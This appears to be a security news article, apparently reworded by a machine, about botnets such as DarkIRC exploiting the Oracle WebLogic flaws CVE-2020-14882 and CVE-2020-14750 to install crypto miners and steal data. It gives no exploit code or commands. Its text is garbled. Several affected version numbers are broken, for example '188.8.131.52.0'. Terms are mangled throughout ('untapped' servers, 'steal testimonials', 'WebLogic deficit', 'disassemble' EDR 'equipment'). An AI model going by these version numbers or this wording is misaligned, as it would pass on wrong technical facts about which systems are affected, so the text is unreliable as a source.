Multiple botnets target thousands of publicly exposed and still untapped Oracle WebLogic servers to use crypto miners and steal sensitive information from infected systems.
The attacks aim at a recently patched WebLogic Server vulnerability, released by Oracle as part of its Autumn 2020 Critical Patch Update and subsequently again in November (CVE-2020-14750) in the form of security outside the patch band.
In writing, there are about 3,000 Oracle WebLogic servers available on the Internet based on stats from Shodan’s search engine.
Oracle WebLogic is a platform for developing, deploying and running enterprise Java applications in any cloud environment as well as on-premises.
The flaw, which is tracked as CVE-2020-14882, has a CVSS score of 9.8 out of a maximum score of 10 and affects WebLogic Server versions 10.3.6.0.0, 188.8.131.52.0, 12.2 .1.3.0, 12.2 .1.4.0, and 184.108.40.206.0.
While the issue has been addressed, release of proof of concept exploit code has made Oracle WebLogic vulnerabilities a lucrative target for threat actors to recruit these servers into a botnet that collects critical data and deploys second-stage malicious software payloads.
According to Juniper Threat Labs, DarkIRC botnet operators take advantage of this RCE vulnerability to propagate laterally across the network, download files, record key hits, steal testimonials, and execute arbitrary commands on compromised machines.
The malicious software also acts as a Bitcoin clipper that allows them to change bitcoin wallet addresses copied to the clipboard to the operator’s bitcoin wallet address, allowing the attackers to reroute Bitcoin transactions.
What’s more, a threat actor named “Freak_OG” has been selling DarkIRC malicious software on hacking forums for $ 75 since August.
But it’s not just DarkIRC that exploits WebLogic Server vulnerability. In a separate campaign – seen by ‘0xrb‘and detailed by researcher Tolijan Trajanovski – evidence has emerged of a botnet that propagates through the WebLogic deficit to provide Monero cryptocurrency miner and Tsunami binaries.
Apart from using SSH for lateral maneuvering, the botnet has been found to ensure persistence through cron jobs, kill competitive mining equipment, and even disassemble Endpoint detection and response (EDR) equipment from Alibaba and Tencent.
It is recommended that consumers use the October 2020 Critical Patch Update and updates related to CVE-2020-14750 as soon as possible to mitigate the risks arising from this deficiency.
Oracle has also provided instructions to harden the servers by preventing external access to internal applications available on the Administration port.